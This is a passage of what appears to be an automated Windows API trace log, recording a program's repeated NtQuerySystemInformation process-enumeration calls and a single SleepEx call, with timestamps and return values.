NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.267] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.267] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.268] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.268] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.333] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0215.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.862] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.862] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.876] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.877] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0215.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, 